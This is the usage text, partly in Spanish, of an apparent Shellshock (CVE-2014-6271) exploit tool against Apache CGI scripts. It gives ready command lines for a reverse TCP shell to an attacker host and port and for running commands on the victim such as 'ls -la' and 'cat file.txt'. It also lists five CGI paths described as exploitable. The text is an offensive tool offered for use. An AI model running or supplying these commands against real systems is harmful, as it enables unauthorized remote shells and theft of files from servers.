
[CVE-2014-6271] Herramienta de inyección remota de comandos Shellshock de Apache para shell inverso rápido y navegación de archivos
[CVE-2014-6271] Herramienta de Apache Shellshock de inyección remota de comandos para shell inversa rápida y navegación de archivos
Shellshock Apache remote exploit
Usage:
./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"
Variables:
Victim:
rhost => IP de la víctima
rport => PUERTO de la víctima
Attacker (For reverse shell):
lhost => IP del atacante
lport => PUERTO del atacante para shell inversa
Echo:
echo => Comando personalizado a inyectar
Examples:
echo="ls -la"
echo="cat file.txt"
Config:
pages => Páginas CGI vulnerables específicas
Exploitable pages:
[0] /cgi-sys/entropysearch.cgi",
[1] /cgi-sys/defaultwebpage.cgi",
[2] /cgi-mod/index.cgi",
[3] /cgi-bin/test.cgi",
[4] /cgi-bin-sdb/printenv
Payloads:
"reverse" => (unix universal) Shell inversa TCP (Requiere: rhost, lhost, lport)
"files" => Leer y navegar por archivos (Requiere: rhost, echo)
Creado por Filip Studený